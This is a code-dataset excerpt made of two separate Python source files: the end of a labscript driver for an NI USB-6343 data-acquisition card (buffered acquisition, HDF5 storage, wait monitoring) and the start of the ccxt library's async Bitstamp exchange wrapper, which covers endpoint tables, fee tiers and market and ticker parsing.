self.task.CfgDigEdgeStartTrig(self.clock_terminal,DAQmx_Val_Rising)
#DAQmx Start Code
self.task.StartTask()
# TODO: Need to do something about the time for buffered acquisition. Should be related to when it starts (approx)
# How do we detect that?
self.t0 = time.time() - time.timezone
self.task_running = True
self.daqlock.notify()
self.logger.debug('finished setup_task')
def stop_task(self):
self.logger.debug('stop_task')
with self.daqlock:
self.logger.debug('stop_task got daqlock')
if self.task_running:
self.task_running = False
self.task.StopTask()
self.task.ClearTask()
self.daqlock.notify()
self.logger.debug('finished stop_task')
def transition_to_buffered(self,device_name,h5file,initial_values,fresh):
# TODO: Do this line better!
self.device_name = device_name
self.logger.debug('transition_to_buffered')
# stop current task
self.stop_task()
self.buffered_data_list = []
# Save h5file path (for storing data later!)
self.h5_file = h5file
# read channels, acquisition rate, etc from H5 file
h5_chnls = []
with h5py.File(h5file,'r') as hdf5_file:
group = hdf5_file['/devices/'+device_name]
device_properties = labscript_utils.properties.get(hdf5_file, device_name, 'device_properties')
connection_table_properties = labscript_utils.properties.get(hdf5_file, device_name, 'connection_table_properties')
self.clock_terminal = connection_table_properties['clock_terminal']
if 'analog_in_channels' in device_properties:
h5_chnls = device_properties['analog_in_channels'].split(', ')
self.buffered_rate = device_properties['sample_rate_AI']
else:
self.logger.debug("no input channels")
# combine static channels with h5 channels (using a set to avoid duplicates)
self.buffered_channels = set(h5_chnls)
self.buffered_channels.update(self.channels)
# Now make it a sorted list:
self.buffered_channels = sorted(list(self.buffered_channels))
# setup task (rate should be from h5 file)
# Possibly should detect and lower rate if too high, as h5 file doesn't know about other acquisition channels?
if self.buffered_rate <= 0:
self.buffered_rate = self.rate
self.buffered = True
if len(self.buffered_channels) == 1:
self.buffered_data = numpy.zeros((1,),dtype=numpy.float64)
else:
self.buffered_data = numpy.zeros((1,len(self.buffered_channels)),dtype=numpy.float64)
self.setup_task()
return {}
def transition_to_manual(self,abort=False):
self.logger.debug('transition_to_static')
# Stop acquisition (this should really be done on a digital edge, but that is for later! Maybe use a Counter)
# Set the abort flag so that the acquisition thread knows to expect an exception in the case of an abort:
#
# TODO: This is probably bad because it shortly get's overwritten to False
# However whether it has an effect depends on whether daqmx_read thread holds the daqlock
# when self.stop_task() is called
self.abort = abort
self.stop_task()
# Reset the abort flag so that unexpected exceptions are still raised:
self.abort = False
self.logger.info('transitioning to static, task stopped')
# save the data acquired to the h5 file
if not abort:
with h5py.File(self.h5_file,'a') as hdf5_file:
data_group = hdf5_file['data']
data_group.create_group(self.device_name)
dtypes = [(chan.split('/')[-1],numpy.float32) for chan in sorted(self.buffered_channels)]
start_time = time.time()
if self.buffered_data_list:
self.buffered_data = numpy.zeros(len(self.buffered_data_list)*1000,dtype=dtypes)
for i, data in enumerate(self.buffered_data_list):
data.shape = (len(self.buffered_channels),self.ai_read.value)
for j, (chan, dtype) in enumerate(dtypes):
self.buffered_data[chan][i*1000:(i*1000)+1000] = data[j,:]
if i % 100 == 0:
self.logger.debug( str(i/100) + " time: "+str(time.time()-start_time))
self.extract_measurements(self.device_name)
self.logger.info('data written, time taken: %ss' % str(time.time()-start_time))
self.buffered_data = None
self.buffered_data_list = []
# Send data to callback functions as requested (in one big chunk!)
#self.result_queue.put([self.t0,self.rate,self.ai_read,len(self.channels),self.ai_data])
# return to previous acquisition mode
self.buffered = False
self.setup_task()
return True
def extract_measurements(self, device_name):
self.logger.debug('extract_measurements')
with h5py.File(self.h5_file,'a') as hdf5_file:
waits_in_use = len(hdf5_file['waits']) > 0
if waits_in_use:
# There were waits in this shot. We need to wait until the other process has
# determined their durations before we proceed:
self.wait_durations_analysed.wait(self.h5_file)
with h5py.File(self.h5_file,'a') as hdf5_file:
try:
acquisitions = hdf5_file['/devices/'+device_name+'/ACQUISITIONS']
except:
# No acquisitions!
return
try:
measurements = hdf5_file['/data/traces']
except:
# Group doesn't exist yet, create it:
measurements = hdf5_file.create_group('/data/traces')
for connection,label,start_time,end_time,wait_label,scale_factor,units in acquisitions:
start_index = numpy.ceil(self.buffered_rate*(start_time-self.ai_start_delay))
end_index = numpy.floor(self.buffered_rate*(end_time-self.ai_start_delay))
# numpy.ceil does what we want above, but float errors can miss the equality
if self.ai_start_delay + (start_index-1)/self.buffered_rate - start_time > -2e-16:
start_index -= 1
# We actually want numpy.floor(x) to yield the largest integer < x (not <=)
if end_time - self.ai_start_delay - end_index/self.buffered_rate < 2e-16:
end_index -= 1
acquisition_start_time = self.ai_start_delay + start_index/self.buffered_rate
acquisition_end_time = self.ai_start_delay + end_index/self.buffered_rate
times = numpy.linspace(acquisition_start_time, acquisition_end_time,
end_index-start_index+1,
endpoint=True)
values = self.buffered_data[connection][start_index:end_index+1]
dtypes = [('t', numpy.float64),('values', numpy.float32)]
data = numpy.empty(len(values),dtype=dtypes)
data['t'] = times
data['values'] = values
measurements.create_dataset(label, data=data)
def abort_buffered(self):
#TODO: test this
return self.transition_to_manual(True)
def abort_transition_to_buffered(self):
#TODO: test this
return self.transition_to_manual(True)
def program_manual(self,values):
return {}
class NI_USB_6343WaitMonitorWorker(Worker):
def init(self):
exec 'import ctypes' in globals()
exec 'from PyDAQmx import Task' in globals()
exec 'from PyDAQmx.DAQmxConstants import *' in globals()
exec 'from PyDAQmx.DAQmxTypes import *' in globals()
global h5py; import labscript_utils.h5_lock, h5py
global numpy; import numpy
global threading; import threading
global zprocess; import zprocess
global logging; import logging
global time; import time
self.task_running = False
self.daqlock = threading.Lock() # not sure if needed, access should be serialised already
self.h5_file = None
self.task = None
self.abort = False
self.all_waits_finished = zprocess.Event('all_waits_finished',type='post')
self.wait_durations_analysed = zprocess.Event('wait_durations_analysed',type='post')
def shutdown(self):
self.logger.info('Shutdown requested, stopping task')
if self.task_running:
self.stop_task()
#def read_one_half_period(self, timeout, readarray = numpy.empty(1)):
def read_one_half_period(self, timeout):
readarray = numpy.empty(1)
try:
with self.daqlock:
self.acquisition_task.ReadCounterF64(1, timeout, readarray, len(readarray), ctypes.c_long(1), None)
self.half_periods.append(readarray[0])
return readarray[0]
except Exception:
if self.abort:
raise
# otherwise, it's a timeout:
return None
def wait_for_edge(self, timeout=None):
if timeout is None:
while True:
half_period = self.read_one_half_period(1)
if half_period is not None:
return half_period
else:
return self.read_one_half_period(timeout)
def daqmx_read(self):
logger = logging.getLogger('BLACS.%s_%s.read_thread'%(self.device_name, self.worker_name))
logger.info('Starting')
with self.kill_lock:
try:
# Wait for the end of the first pulse indicating the start of the experiment:
current_time = pulse_width = self.wait_for_edge()
# alright, we're now a short way into the experiment.
for wait in self.wait_table:
# How long until this wait should time out?
timeout = wait['time'] + wait['timeout'] - current_time
timeout = max(timeout, 0) # ensure non-negative
# Wait that long for the next pulse:
half_period = self.wait_for_edge(timeout)
# Did the wait finish of its own accord?
if half_period is not None:
# It did, we are now at the end of that wait:
current_time = wait['time']
# Wait for the end of the pulse:
current_time += self.wait_for_edge()
else:
# It timed out. Better trigger the clock to resume!.
self.send_resume_trigger(pulse_width)
# Wait for it to respond to that:
self.wait_for_edge()
# Alright, *now* we're at the end of the wait.
current_time = wait['time']
# And wait for the end of the pulse:
current_time += self.wait_for_edge()
# Inform any interested parties that waits have all finished:
self.all_waits_finished.post(self.h5_file)
except Exception:
if self.abort:
return
else:
raise
def send_resume_trigger(self, pulse_width):
written = int32()
# go high:
self.timeout_task.WriteDigitalLines(1,True,1,DAQmx_Val_GroupByChannel,numpy.ones(1, dtype=numpy.uint8),byref(written),None)
assert written.value == 1
# Wait however long we observed the first pulse of the experiment to be:
time.sleep(pulse_width)
# go high:
self.timeout_task.WriteDigitalLines(1,True,1,DAQmx_Val_GroupByChannel,numpy.ones(1, dtype=numpy.uint8),byref(written),None)
assert written.value == 1
def stop_task(self):
self.logger.debug('stop_task')
with self.daqlock:
self.logger.debug('stop_task got daqlock')
if self.task_running:
self.task_running = False
self.acquisition_task.StopTask()
self.acquisition_task.ClearTask()
self.timeout_task.StopTask()
self.timeout_task.ClearTask()
self.logger.debug('finished stop_task')
def transition_to_buffered(self,device_name,h5file,initial_values,fresh):
self.logger.debug('transition_to_buffered')
# Save h5file path (for storing data later!)
self.h5_file = h5file
self.is_wait_monitor_device = False # Will be set to true in a moment if necessary
self.logger.debug('setup_task')
with h5py.File(h5file, 'r') as hdf5_file:
dataset = hdf5_file['waits']
if len(dataset) == 0:
# There are no waits. Do nothing.
self.logger.debug('There are no waits, not transitioning to buffered')
self.waits_in_use = False
self.wait_table = numpy.zeros((0,))
return {}
self.waits_in_use = True
acquisition_device = dataset.attrs['wait_monitor_acquisition_device']
acquisition_connection = dataset.attrs['wait_monitor_acquisition_connection']
timeout_device = dataset.attrs['wait_monitor_timeout_device']
timeout_connection = dataset.attrs['wait_monitor_timeout_connection']
self.wait_table = dataset[:]
# Only do anything if we are in fact the wait_monitor device:
if timeout_device == device_name or acquisition_device == device_name:
if not timeout_device == device_name and acquisition_device == device_name:
raise NotImplementedError("NI-USB-6343 worker must be both the wait monitor timeout device and acquisition device." +
"Being only one could be implemented if there's a need for it, but it isn't at the moment")
self.is_wait_monitor_device = True
# The counter acquisition task:
self.acquisition_task = Task()
acquisition_chan = '/'.join([self.MAX_name,acquisition_connection])
self.acquisition_task.CreateCISemiPeriodChan(acquisition_chan, '', 100e-9, 200, DAQmx_Val_Seconds, "")
self.acquisition_task.CfgImplicitTiming(DAQmx_Val_ContSamps, 1000)
self.acquisition_task.StartTask()
# The timeout task:
self.timeout_task = Task()
timeout_chan = '/'.join([self.MAX_name,timeout_connection])
self.timeout_task.CreateDOChan(timeout_chan,"",DAQmx_Val_ChanForAllLines)
self.task_running = True
# An array to store the results of counter acquisition:
self.half_periods = []
self.read_thread = threading.Thread(target=self.daqmx_read)
# Not a daemon thread, as it implements wait timeouts - we need it to stay alive if other things die.
self.read_thread.start()
self.logger.debug('finished transition to buffered')
return {}
def transition_to_manual(self,abort=False):
self.logger.debug('transition_to_static')
self.abort = abort
self.stop_task()
# Reset the abort flag so that unexpected exceptions are still raised:
self.abort = False
self.logger.info('transitioning to static, task stopped')
# save the data acquired to the h5 file
if not abort:
if self.waits_in_use:
# Let's work out how long the waits were. The absolute times of each edge on the wait
# monitor were:
edge_times = numpy.cumsum(self.half_periods)
# Now there was also a rising edge at t=0 that we didn't measure:
edge_times = numpy.insert(edge_times,0,0)
# Ok, and the even-indexed ones of these were rising edges.
rising_edge_times = edge_times[::2]
# Now what were the times between rising edges?
periods = numpy.diff(rising_edge_times)
# How does this compare to how long we expected there to be between the start
# of the experiment and the first wait, and then between each pair of waits?
# The difference will give us the waits' durations.
resume_times = self.wait_table['time']
# Again, include the start of the experiment, t=0:
resume_times = numpy.insert(resume_times,0,0)
run_periods = numpy.diff(resume_times)
wait_durations = periods - run_periods
waits_timed_out = wait_durations > self.wait_table['timeout']
with h5py.File(self.h5_file,'a') as hdf5_file:
# Work out how long the waits were, save em, post an event saying so
dtypes = [('label','a256'),('time',float),('timeout',float),('duration',float),('timed_out',bool)]
data = numpy.empty(len(self.wait_table), dtype=dtypes)
if self.waits_in_use:
data['label'] = self.wait_table['label']
data['time'] = self.wait_table['time']
data['timeout'] = self.wait_table['timeout']
data['duration'] = wait_durations
data['timed_out'] = waits_timed_out
if self.is_wait_monitor_device:
hdf5_file.create_dataset('/data/waits', data=data)
if self.is_wait_monitor_device:
self.wait_durations_analysed.post(self.h5_file)
return True
def abort_buffered(self):
#TODO: test this
return self.transition_to_manual(True)
def abort_transition_to_buffered(self):
#TODO: test this
return self.transition_to_manual(True)
def program_manual(self,values):
return {}
@runviewer_parser
class RunviewerClass(parent.RunviewerClass):
def __init__(self, *args, **kwargs):
kwargs["num_DO"]=32
parent.RunviewerClass.__init__(self, *args, **kwargs)
| 46.572275
| 204
| 0.576996
|
6350c3cbae528bc309377b51d8616ad7fbd150a6
| 66,342
|
py
|
Python
|
python/ccxt/async_support/bitstamp.py
|
pcriadoperez/ccxt
|
fd0db4bad42f4f937c401cdb4cd0bcc4e716282e
|
[
"MIT"
] | null | null | null |
python/ccxt/async_support/bitstamp.py
|
pcriadoperez/ccxt
|
fd0db4bad42f4f937c401cdb4cd0bcc4e716282e
|
[
"MIT"
] | null | null | null |
python/ccxt/async_support/bitstamp.py
|
pcriadoperez/ccxt
|
fd0db4bad42f4f937c401cdb4cd0bcc4e716282e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidAddress
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import NotSupported
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import OnMaintenance
from ccxt.base.errors import InvalidNonce
from ccxt.base.precise import Precise
class bitstamp(Exchange):
def describe(self):
return self.deep_extend(super(bitstamp, self).describe(), {
'id': 'bitstamp',
'name': 'Bitstamp',
'countries': ['GB'],
# 8000 requests per 10 minutes = 8000 / 600 = 13.33333333 requests per second => 1000ms / 13.33333333 = 75ms between requests on average
'rateLimit': 75,
'version': 'v2',
'userAgent': self.userAgents['chrome'],
'pro': True,
'has': {
'CORS': True,
'spot': True,
'margin': False,
'swap': False,
'future': False,
'option': False,
'addMargin': False,
'cancelAllOrders': True,
'cancelOrder': True,
'createOrder': True,
'createReduceOnlyOrder': False,
'fetchBalance': True,
'fetchBorrowRate': False,
'fetchBorrowRateHistories': False,
'fetchBorrowRateHistory': False,
'fetchBorrowRates': False,
'fetchBorrowRatesPerSymbol': False,
'fetchCurrencies': True,
'fetchDepositAddress': True,
'fetchFundingFees': True,
'fetchFundingHistory': False,
'fetchFundingRate': False,
'fetchFundingRateHistory': False,
'fetchFundingRates': False,
'fetchIndexOHLCV': False,
'fetchLedger': True,
'fetchLeverage': False,
'fetchMarkets': True,
'fetchMarkOHLCV': False,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchPosition': False,
'fetchPositions': False,
'fetchPositionsRisk': False,
'fetchPremiumIndexOHLCV': False,
'fetchTicker': True,
'fetchTrades': True,
'fetchTradingFee': True,
'fetchTradingFees': True,
'fetchTransactions': True,
'fetchWithdrawals': True,
'reduceMargin': False,
'setLeverage': False,
'setMarginMode': False,
'setPositionMode': False,
'withdraw': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27786377-8c8ab57e-5fe9-11e7-8ea4-2b05b6bcceec.jpg',
'api': {
'public': 'https://www.bitstamp.net/api',
'private': 'https://www.bitstamp.net/api',
},
'www': 'https://www.bitstamp.net',
'doc': 'https://www.bitstamp.net/api',
},
'timeframes': {
'1m': '60',
'3m': '180',
'5m': '300',
'15m': '900',
'30m': '1800',
'1h': '3600',
'2h': '7200',
'4h': '14400',
'6h': '21600',
'12h': '43200',
'1d': '86400',
'1w': '259200',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
},
'api': {
'public': {
'get': {
'ohlc/{pair}/': 1,
'order_book/{pair}/': 1,
'ticker_hour/{pair}/': 1,
'ticker/{pair}/': 1,
'transactions/{pair}/': 1,
'trading-pairs-info/': 1,
},
},
'private': {
'post': {
'balance/': 1,
'balance/{pair}/': 1,
'bch_withdrawal/': 1,
'bch_address/': 1,
'user_transactions/': 1,
'user_transactions/{pair}/': 1,
'open_orders/all/': 1,
'open_orders/{pair}/': 1,
'order_status/': 1,
'cancel_order/': 1,
'cancel_all_orders/': 1,
'cancel_all_orders/{pair}/': 1,
'buy/{pair}/': 1,
'buy/market/{pair}/': 1,
'buy/instant/{pair}/': 1,
'sell/{pair}/': 1,
'sell/market/{pair}/': 1,
'sell/instant/{pair}/': 1,
'btc_withdrawal/': 1,
'btc_address/': 1,
'ripple_withdrawal/': 1,
'ripple_address/': 1,
'ltc_withdrawal/': 1,
'ltc_address/': 1,
'eth_withdrawal/': 1,
'eth_address/': 1,
'xrp_withdrawal/': 1,
'xrp_address/': 1,
'xlm_withdrawal/': 1,
'xlm_address/': 1,
'pax_withdrawal/': 1,
'pax_address/': 1,
'link_withdrawal/': 1,
'link_address/': 1,
'usdc_withdrawal/': 1,
'usdc_address/': 1,
'omg_withdrawal/': 1,
'omg_address/': 1,
'dai_withdrawal/': 1,
'dai_address/': 1,
'knc_withdrawal/': 1,
'knc_address/': 1,
'mkr_withdrawal/': 1,
'mkr_address/': 1,
'zrx_withdrawal/': 1,
'zrx_address/': 1,
'gusd_withdrawal/': 1,
'gusd_address/': 1,
'aave_withdrawal/': 1,
'aave_address/': 1,
'bat_withdrawal/': 1,
'bat_address/': 1,
'uma_withdrawal/': 1,
'uma_address/': 1,
'snx_withdrawal/': 1,
'snx_address/': 1,
'uni_withdrawal/': 1,
'uni_address/': 1,
'yfi_withdrawal/': 1,
'yfi_address': 1,
'audio_withdrawal/': 1,
'audio_address/': 1,
'crv_withdrawal/': 1,
'crv_address/': 1,
'algo_withdrawal/': 1,
'algo_address/': 1,
'comp_withdrawal/': 1,
'comp_address/': 1,
'grt_withdrawal': 1,
'grt_address/': 1,
'usdt_withdrawal/': 1,
'usdt_address/': 1,
'eurt_withdrawal/': 1,
'eurt_address/': 1,
'matic_withdrawal/': 1,
'matic_address/': 1,
'sushi_withdrawal/': 1,
'sushi_address/': 1,
'chz_withdrawal/': 1,
'chz_address/': 1,
'enj_withdrawal/': 1,
'enj_address/': 1,
'alpha_withdrawal/': 1,
'alpha_address/': 1,
'ftt_withdrawal/': 1,
'ftt_address/': 1,
'storj_withdrawal/': 1,
'storj_address/': 1,
'axs_withdrawal/': 1,
'axs_address/': 1,
'sand_withdrawal/': 1,
'sand_address/': 1,
'hbar_withdrawal/': 1,
'hbar_address/': 1,
'rgt_withdrawal/': 1,
'rgt_address/': 1,
'fet_withdrawal/': 1,
'fet_address/': 1,
'skl_withdrawal/': 1,
'skl_address/': 1,
'cel_withdrawal/': 1,
'cel_address/': 1,
'sxp_withdrawal/': 1,
'sxp_address/': 1,
'ada_withdrawal/': 1,
'ada_address/': 1,
'slp_withdrawal/': 1,
'slp_address/': 1,
'ftm_withdrawal/': 1,
'ftm_address/': 1,
'perp_withdrawal/': 1,
'perp_address/': 1,
'dydx_withdrawal/': 1,
'dydx_address/': 1,
'gala_withdrawal/': 1,
'gala_address/': 1,
'shib_withdrawal/': 1,
'shib_address/': 1,
'amp_withdrawal/': 1,
'amp_address/': 1,
'sgb_withdrawal/': 1,
'sgb_address/': 1,
'avax_withdrawal/': 1,
'avax_address/': 1,
'wbtc_withdrawal/': 1,
'wbtc_address/': 1,
'ctsi_withdrawal/': 1,
'ctsi_address/': 1,
'cvx_withdrawal/': 1,
'cvx_address/': 1,
'imx_withdrawal/': 1,
'imx_address/': 1,
'nexo_withdrawal/': 1,
'nexo_address/': 1,
'ust_withdrawal/': 1,
'ust_address/': 1,
'transfer-to-main/': 1,
'transfer-from-main/': 1,
'withdrawal-requests/': 1,
'withdrawal/open/': 1,
'withdrawal/status/': 1,
'withdrawal/cancel/': 1,
'liquidation_address/new/': 1,
'liquidation_address/info/': 1,
'btc_unconfirmed/': 1,
'websockets_token/': 1,
},
},
},
'fees': {
'trading': {
'tierBased': True,
'percentage': True,
'taker': self.parse_number('0.005'),
'maker': self.parse_number('0.005'),
'tiers': {
'taker': [
[self.parse_number('0'), self.parse_number('0.005')],
[self.parse_number('20000'), self.parse_number('0.0025')],
[self.parse_number('100000'), self.parse_number('0.0024')],
[self.parse_number('200000'), self.parse_number('0.0022')],
[self.parse_number('400000'), self.parse_number('0.0020')],
[self.parse_number('600000'), self.parse_number('0.0015')],
[self.parse_number('1000000'), self.parse_number('0.0014')],
[self.parse_number('2000000'), self.parse_number('0.0013')],
[self.parse_number('4000000'), self.parse_number('0.0012')],
[self.parse_number('20000000'), self.parse_number('0.0011')],
[self.parse_number('50000000'), self.parse_number('0.0010')],
[self.parse_number('100000000'), self.parse_number('0.0007')],
[self.parse_number('500000000'), self.parse_number('0.0005')],
[self.parse_number('2000000000'), self.parse_number('0.0003')],
[self.parse_number('6000000000'), self.parse_number('0.0001')],
[self.parse_number('20000000000'), self.parse_number('0.00005')],
[self.parse_number('20000000001'), self.parse_number('0')],
],
'maker': [
[self.parse_number('0'), self.parse_number('0.005')],
[self.parse_number('20000'), self.parse_number('0.0025')],
[self.parse_number('100000'), self.parse_number('0.0024')],
[self.parse_number('200000'), self.parse_number('0.0022')],
[self.parse_number('400000'), self.parse_number('0.0020')],
[self.parse_number('600000'), self.parse_number('0.0015')],
[self.parse_number('1000000'), self.parse_number('0.0014')],
[self.parse_number('2000000'), self.parse_number('0.0013')],
[self.parse_number('4000000'), self.parse_number('0.0012')],
[self.parse_number('20000000'), self.parse_number('0.0011')],
[self.parse_number('50000000'), self.parse_number('0.0010')],
[self.parse_number('100000000'), self.parse_number('0.0007')],
[self.parse_number('500000000'), self.parse_number('0.0005')],
[self.parse_number('2000000000'), self.parse_number('0.0003')],
[self.parse_number('6000000000'), self.parse_number('0.0001')],
[self.parse_number('20000000000'), self.parse_number('0.00005')],
[self.parse_number('20000000001'), self.parse_number('0')],
],
},
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {},
'deposit': {
'BTC': 0,
'BCH': 0,
'LTC': 0,
'ETH': 0,
'XRP': 0,
'XLM': 0,
'PAX': 0,
'USD': 7.5,
'EUR': 0,
},
},
},
'exceptions': {
'exact': {
'No permission found': PermissionDenied,
'API key not found': AuthenticationError,
'IP address not allowed': PermissionDenied,
'Invalid nonce': InvalidNonce,
'Invalid signature': AuthenticationError,
'Authentication failed': AuthenticationError,
'Missing key, signature and nonce parameters': AuthenticationError,
'Wrong API key format': AuthenticationError,
'Your account is frozen': PermissionDenied,
'Please update your profile with your FATCA information, before using API.': PermissionDenied,
'Order not found': OrderNotFound,
'Price is more than 20% below market price.': InvalidOrder,
"Bitstamp.net is under scheduled maintenance. We'll be back soon.": OnMaintenance, # {"error": "Bitstamp.net is under scheduled maintenance. We'll be back soon."}
'Order could not be placed.': ExchangeNotAvailable, # Order could not be placed(perhaps due to internal error or trade halt). Please retry placing order.
'Invalid offset.': BadRequest,
},
'broad': {
'Minimum order size is': InvalidOrder, # Minimum order size is 5.0 EUR.
'Check your account balance for details.': InsufficientFunds, # You have only 0.00100000 BTC available. Check your account balance for details.
'Ensure self value has at least': InvalidAddress, # Ensure self value has at least 25 characters(it has 4).
},
},
})
async def fetch_markets(self, params={}):
response = await self.fetch_markets_from_cache(params)
#
# [
# {
# "trading": "Enabled",
# "base_decimals": 8,
# "url_symbol": "btcusd",
# "name": "BTC/USD",
# "instant_and_market_orders": "Enabled",
# "minimum_order": "20.0 USD",
# "counter_decimals": 2,
# "description": "Bitcoin / U.S. dollar"
# }
# ]
#
result = []
for i in range(0, len(response)):
market = response[i]
name = self.safe_string(market, 'name')
base, quote = name.split('/')
baseId = base.lower()
quoteId = quote.lower()
base = self.safe_currency_code(base)
quote = self.safe_currency_code(quote)
minimumOrder = self.safe_string(market, 'minimum_order')
parts = minimumOrder.split(' ')
status = self.safe_string(market, 'trading')
result.append({
'id': self.safe_string(market, 'url_symbol'),
'marketId': baseId + '_' + quoteId,
'symbol': base + '/' + quote,
'base': base,
'quote': quote,
'settle': None,
'baseId': baseId,
'quoteId': quoteId,
'settleId': None,
'type': 'spot',
'spot': True,
'margin': False,
'future': False,
'swap': False,
'option': False,
'active': (status == 'Enabled'),
'contract': False,
'linear': None,
'inverse': None,
'contractSize': None,
'expiry': None,
'expiryDatetime': None,
'strike': None,
'optionType': None,
'precision': {
'amount': self.safe_integer(market, 'base_decimals'),
'price': self.safe_integer(market, 'counter_decimals'),
},
'limits': {
'leverage': {
'min': None,
'max': None,
},
'amount': {
'min': None,
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': self.safe_number(parts, 0),
'max': None,
},
},
'info': market,
})
return result
def construct_currency_object(self, id, code, name, precision, minCost, originalPayload):
currencyType = 'crypto'
description = self.describe()
if self.is_fiat(code):
currencyType = 'fiat'
return {
'id': id,
'code': code,
'info': originalPayload, # the original payload
'type': currencyType,
'name': name,
'active': True,
'deposit': None,
'withdraw': None,
'fee': self.safe_number(description['fees']['funding']['withdraw'], code),
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision),
'max': None,
},
'price': {
'min': math.pow(10, -precision),
'max': None,
},
'cost': {
'min': minCost,
'max': None,
},
'withdraw': {
'min': None,
'max': None,
},
},
}
async def fetch_markets_from_cache(self, params={}):
# self method is now redundant
# currencies are now fetched before markets
options = self.safe_value(self.options, 'fetchMarkets', {})
timestamp = self.safe_integer(options, 'timestamp')
expires = self.safe_integer(options, 'expires', 1000)
now = self.milliseconds()
if (timestamp is None) or ((now - timestamp) > expires):
response = await self.publicGetTradingPairsInfo(params)
self.options['fetchMarkets'] = self.extend(options, {
'response': response,
'timestamp': now,
})
return self.safe_value(self.options['fetchMarkets'], 'response')
async def fetch_currencies(self, params={}):
response = await self.fetch_markets_from_cache(params)
#
# [
# {
# "trading": "Enabled",
# "base_decimals": 8,
# "url_symbol": "btcusd",
# "name": "BTC/USD",
# "instant_and_market_orders": "Enabled",
# "minimum_order": "20.0 USD",
# "counter_decimals": 2,
# "description": "Bitcoin / U.S. dollar"
# },
# ]
#
result = {}
for i in range(0, len(response)):
market = response[i]
name = self.safe_string(market, 'name')
base, quote = name.split('/')
baseId = base.lower()
quoteId = quote.lower()
base = self.safe_currency_code(base)
quote = self.safe_currency_code(quote)
description = self.safe_string(market, 'description')
baseDescription, quoteDescription = description.split(' / ')
minimumOrder = self.safe_string(market, 'minimum_order')
parts = minimumOrder.split(' ')
cost = parts[0]
if not (base in result):
baseDecimals = self.safe_integer(market, 'base_decimals')
result[base] = self.construct_currency_object(baseId, base, baseDescription, baseDecimals, None, market)
if not (quote in result):
counterDecimals = self.safe_integer(market, 'counter_decimals')
result[quote] = self.construct_currency_object(quoteId, quote, quoteDescription, counterDecimals, self.parse_number(cost), market)
return result
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
request = {
'pair': self.market_id(symbol),
}
response = await self.publicGetOrderBookPair(self.extend(request, params))
#
# {
# "timestamp": "1583652948",
# "microtimestamp": "1583652948955826",
# "bids": [
# ["8750.00", "1.33685271"],
# ["8749.39", "0.07700000"],
# ["8746.98", "0.07400000"],
# ]
# "asks": [
# ["8754.10", "1.51995636"],
# ["8754.71", "1.40000000"],
# ["8754.72", "2.50000000"],
# ]
# }
#
microtimestamp = self.safe_integer(response, 'microtimestamp')
timestamp = int(microtimestamp / 1000)
orderbook = self.parse_order_book(response, symbol, timestamp)
orderbook['nonce'] = microtimestamp
return orderbook
def parse_ticker(self, ticker, market=None):
#
# {
# "high": "37534.15",
# "last": "36487.44",
# "timestamp":
# "1643370585",
# "bid": "36475.15",
# "vwap": "36595.67",
# "volume": "2848.49168527",
# "low": "35511.32",
# "ask": "36487.44",
# "open": "37179.62"
# }
#
symbol = self.safe_symbol(None, market)
timestamp = self.safe_timestamp(ticker, 'timestamp')
vwap = self.safe_string(ticker, 'vwap')
baseVolume = self.safe_string(ticker, 'volume')
quoteVolume = Precise.string_mul(baseVolume, vwap)
last = self.safe_string(ticker, 'last')
return self.safe_ticker({
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_string(ticker, 'high'),
'low': self.safe_string(ticker, 'low'),
'bid': self.safe_string(ticker, 'bid'),
'bidVolume': None,
'ask': self.safe_string(ticker, 'ask'),
'askVolume': None,
'vwap': vwap,
'open': self.safe_string(ticker, 'open'),
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}, market, False)
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
ticker = await self.publicGetTickerPair(self.extend(request, params))
#
# {
# "high": "37534.15",
# "last": "36487.44",
# "timestamp":
# "1643370585",
# "bid": "36475.15",
# "vwap": "36595.67",
# "volume": "2848.49168527",
# "low": "35511.32",
# "ask": "36487.44",
# "open": "37179.62"
# }
#
return self.parse_ticker(ticker, market)
def get_currency_id_from_transaction(self, transaction):
#
# {
# "fee": "0.00000000",
# "btc_usd": "0.00",
# "datetime": XXX,
# "usd": 0.0,
# "btc": 0.0,
# "eth": "0.05000000",
# "type": "0",
# "id": XXX,
# "eur": 0.0
# }
#
currencyId = self.safe_string_lower(transaction, 'currency')
if currencyId is not None:
return currencyId
transaction = self.omit(transaction, [
'fee',
'price',
'datetime',
'type',
'status',
'id',
])
ids = list(transaction.keys())
for i in range(0, len(ids)):
id = ids[i]
if id.find('_') < 0:
value = self.safe_number(transaction, id)
if (value is not None) and (value != 0):
return id
return None
def get_market_from_trade(self, trade):
trade = self.omit(trade, [
'fee',
'price',
'datetime',
'tid',
'type',
'order_id',
'side',
])
currencyIds = list(trade.keys())
numCurrencyIds = len(currencyIds)
if numCurrencyIds > 2:
raise ExchangeError(self.id + ' getMarketFromTrade too many keys: ' + self.json(currencyIds) + ' in the trade: ' + self.json(trade))
if numCurrencyIds == 2:
marketId = currencyIds[0] + currencyIds[1]
if marketId in self.markets_by_id:
return self.markets_by_id[marketId]
marketId = currencyIds[1] + currencyIds[0]
if marketId in self.markets_by_id:
return self.markets_by_id[marketId]
return None
